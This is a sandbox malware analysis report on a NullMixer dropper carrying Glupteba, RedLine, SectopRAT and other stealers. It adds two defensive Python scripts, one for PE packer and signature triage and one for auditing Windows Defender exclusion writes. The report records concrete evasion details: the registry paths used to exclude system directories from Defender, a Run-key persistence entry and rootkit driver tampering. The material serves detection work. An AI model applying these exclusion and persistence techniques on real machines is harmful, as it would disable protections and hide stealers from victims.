Malware Analysis Report

2024-11-13 19:29

Sample ID 241109-1a6llavqek
Target ad2a8edb56d190c0a1f70b3475fd5c850ba7f22bc756fb374fa3572cb0942e3f
SHA256 ad2a8edb56d190c0a1f70b3475fd5c850ba7f22bc756fb374fa3572cb0942e3f
Tags
fabookie glupteba nullmixer privateloader redline sectoprat socelars @wadiller0 media22test user01new aspackv2 discovery dropper evasion execution infostealer loader persistence privilege_escalation rat rootkit spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

score
10/10

SHA256

ad2a8edb56d190c0a1f70b3475fd5c850ba7f22bc756fb374fa3572cb0942e3f

Threat Level: Known bad

The file ad2a8edb56d190c0a1f70b3475fd5c850ba7f22bc756fb374fa3572cb0942e3f was found to be: Known bad.

Malicious Activity Summary


SectopRAT payload
PrivateLoader
Glupteba
Fabookie family
SectopRAT
Socelars family
Nullmixer family
Sectoprat family
Privateloader family
Detect Fabookie payload
RedLine payload
Redline family
Fabookie
Glupteba family
NullMixer
RedLine
Windows security bypass
Socelars payload
Socelars
Modifies boot configuration data using bcdedit
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Modifies Windows Firewall
Possible attempt to disable PatchGuard
Drops file in Drivers directory
Loads dropped DLL
ASPack v2.12-2.42
Executes dropped EXE
Windows security modification
Checks computer location settings
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Manipulates WinMonFS driver.
Checks installed software on the system
Looks up geolocation information via web service
Looks up external IP address via web service
Manipulates WinMon driver.
Suspicious use of SetThreadContext
Checks for VirtualBox DLLs, possible anti-VM trick
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Event Triggered Execution: Netsh Helper DLL
System Location Discovery: System Language Discovery
Program crash
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
Scheduled Task/Job: Scheduled Task
Modifies system certificate store
Modifies Internet Explorer settings
Kills process with taskkill
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 21:27

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 21:27

Reported

2024-11-09 21:30

Platform

win7-20241023-en

Max time kernel

149s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Glupteba

loader dropper glupteba

Glupteba family

glupteba

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Tue12f72da5484b.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\CrimsonSnow = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
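
Both the Unsigned PE hit in static1 and the three ASPack v2.12-2.42 hits above are header-level facts that can be reproduced without a sandbox. The block below is an added example, not the sandbox's own detector and not code from any of the families named in this report: it reads the section table and the security data directory straight from the PE headers. The packer table is a section-name heuristic (ASPack commonly leaves .aspack and .adata sections behind), which is weaker than the byte signature the sandbox matched, and build_test_pe32 constructs a header-only sample so the code runs offline.

```python
"""Static triage of a PE: packer-style section names and embedded Authenticode.

Added example, not from the sandbox report: a dependency-free reading of the PE
headers that reproduces two of the report's static checks as heuristics.
"""
import struct

# Assumption: section names that well-known packers leave behind. The sandbox's
# "ASPack v2.12-2.42" match is a byte signature; this name check is only a hint.
PACKER_SECTION_NAMES = {
    ".aspack": "ASPack", ".adata": "ASPack",
    "UPX0": "UPX", "UPX1": "UPX",
    ".vmp0": "VMProtect", ".vmp1": "VMProtect",
    ".themida": "Themida",
}
IMAGE_DIRECTORY_ENTRY_SECURITY = 4  # data-directory slot that locates the WIN_CERTIFICATE blob


def inspect_pe(data):
    """Return section names, packer hints and whether a certificate table is present."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    dirs_off = {0x10B: 96, 0x20B: 112}.get(magic)  # PE32 vs PE32+ optional-header layout
    if dirs_off is None:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # The security entry holds a raw file offset and a size, not an RVA.
    _cert_off, cert_size = struct.unpack_from(
        "<II", data, opt + dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    names = []
    for i in range(nsec):  # section headers start right after the optional header
        raw = struct.unpack_from("<8s", data, opt + opt_size + 40 * i)[0]
        names.append(raw.rstrip(b"\0").decode("latin-1"))
    packers = sorted({PACKER_SECTION_NAMES[n] for n in names if n in PACKER_SECTION_NAMES})
    return {
        "machine": machine,
        "pe32plus": magic == 0x20B,
        "sections": names,
        "packer_hints": packers,
        "has_certificate_table": cert_size != 0,
    }


def build_test_pe32(section_names, with_certificate=False):
    """Constructed sample: PE32 headers only, no code, just enough for inspect_pe."""
    opt_size = 224  # PE32 optional header length
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew at 0x3C points to offset 64
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<I", opt, 92, 16)    # NumberOfRvaAndSizes
    if with_certificate:
        struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, 0x400, 0x200)
    sections = b"".join(struct.pack("<8s32x", n.encode("ascii")) for n in section_names)
    return dos + b"PE\0\0" + coff + bytes(opt) + sections


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, inspect_pe(fh.read()))
```

A non-zero certificate table only says that a WIN_CERTIFICATE blob is attached; whether it chains to a trusted root is a separate check (Get-AuthenticodeSignature in PowerShell, or signtool verify /pa). Catalog-signed Windows binaries carry no embedded table and read as unsigned here, so the result is a triage hint for files dropped under Temp, not a verdict for anything under System32.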

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127d1be88dd70f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127ff3b5477.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b505de68357.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\YFBh.exE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\gimagex.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Tue12f72da5484b.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\CrimsonSnow = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
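
The ten Defender exclusion writes listed under Windows security bypass and again under Windows security modification are the most useful detection point in this run. The block below is an added example, not part of the sandbox report and not code from any of the families it names: it parses rows in the report's own "Set value (int) <key> = "<data>" <process> N/A" format and says why each write is suspicious. The exclusions are written straight into the registry by a process in the user's Temp directory rather than through Defender's management interface; two of them cover C:\Windows and C:\Windows\System32\drivers wholesale; the process exclusion for csrss.exe is a bare image name rather than a path, and a name-only process exclusion applies to every process with that name wherever its image lives, which is what lets the impostor later dropped at C:\Windows\rss\csrss.exe benefit from it; and the dropper excludes its own image. The trusted-writer prefixes and the directory markers are assumptions to adjust per environment; the ten rows are copied from the table above and the benign control row is constructed.

```python
"""Audit Windows Defender exclusion writes recorded as sandbox registry events.

Added example (not part of the sandbox report): parses rows in the
'Set value (int) <key> = "<data>" <process> N/A' format used above and flags
writes that no legitimate management path would produce.
"""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "kind item writer reasons")

# One report row: value type, exclusion kind, excluded item, data, writing process.
EXCLUSION_ROW = re.compile(
    r'^Set value \((?P<vtype>\w+)\) '
    r'\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\'
    r'(?P<kind>Paths|Processes|Extensions)\\(?P<item>.+?) = "(?P<data>[^"]*)" '
    r'(?P<writer>.+?) N/A$'
)

# Assumption: only Defender's own service binaries are expected to write this key
# directly. Extend with your management agent (Group Policy, SCCM, Intune) paths.
TRUSTED_WRITER_PREFIXES = (
    "c:\\program files\\windows defender\\",
    "c:\\programdata\\microsoft\\windows defender\\platform\\",
)
# Excluding any of these wholesale switches off real-time scanning for the OS.
BROAD_SYSTEM_PATHS = {"c:", "c:\\windows", "c:\\windows\\system32", "c:\\windows\\system32\\drivers"}
# Directories a standard user can write to: an exclusion here shields dropped payloads.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")
# Protected Windows binaries. A name-only process exclusion matches by image name,
# so it also covers an impostor dropped elsewhere (C:\Windows\rss\csrss.exe here).
SYSTEM_BINARY_NAMES = {"csrss.exe", "smss.exe", "wininit.exe", "winlogon.exe",
                       "lsass.exe", "services.exe", "svchost.exe", "explorer.exe"}

# The ten rows from the Windows security bypass table above.
REPORT_ROWS = [
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Tue12f72da5484b.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\CrimsonSnow = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A',
]
# Constructed control row: an exclusion written by the Defender service itself.
BENIGN_ROW = r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Microsoft SQL Server = "0" C:\Program Files\Windows Defender\MsMpEng.exe N/A'


def parse_exclusion_row(row):
    """Return the row's fields as a dict, or None if it is not a Defender exclusion write."""
    m = EXCLUSION_ROW.match(row.strip())
    return m.groupdict() if m else None


def assess_exclusion(row):
    """Return a Finding describing why the write is suspicious, or None if it looks routine."""
    rec = parse_exclusion_row(row)
    if rec is None:
        return None
    kind, item, writer = rec["kind"], rec["item"], rec["writer"]
    item_l, writer_l = item.lower(), writer.lower()
    writer_name = writer_l.rsplit("\\", 1)[-1]
    reasons = []
    if not writer_l.startswith(TRUSTED_WRITER_PREFIXES):
        reasons.append("written directly to the registry by a non-Defender process")
        if any(m in writer_l for m in USER_WRITABLE_MARKERS):
            reasons.append("writer runs from a user-writable location")
    if kind == "Paths":
        if item_l.rstrip("\\") in BROAD_SYSTEM_PATHS:
            reasons.append("excludes an entire system directory")
        if any(m in item_l + "\\" for m in USER_WRITABLE_MARKERS):
            reasons.append("excludes a user-writable staging directory")
    elif kind == "Processes":
        if "\\" not in item and item_l in SYSTEM_BINARY_NAMES:
            reasons.append("name-only exclusion of a system binary also covers impostors outside System32")
        if item_l in (writer_l, writer_name):
            reasons.append("excludes the writing process itself")
    return Finding(kind, item, writer, tuple(reasons)) if reasons else None


def audit_exclusions(rows):
    """Assess every row and keep only the suspicious ones."""
    return [f for f in (assess_exclusion(r) for r in rows) if f is not None]


if __name__ == "__main__":
    for finding in audit_exclusions(REPORT_ROWS):
        print(finding.kind, finding.item)
        for reason in finding.reasons:
            print("   -", reason)
```

Direct registry writes to this key succeed on the win7 image used for this detonation. On current Windows 10/11 builds with tamper protection covering exclusions, the same write is refused, so on a modern host the telemetry to watch is Defender's own configuration-change event (Microsoft-Windows-Windows Defender/Operational, event 5007) and the process that triggered it, rather than raw registry writes.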

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\CrimsonSnow = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe N/A
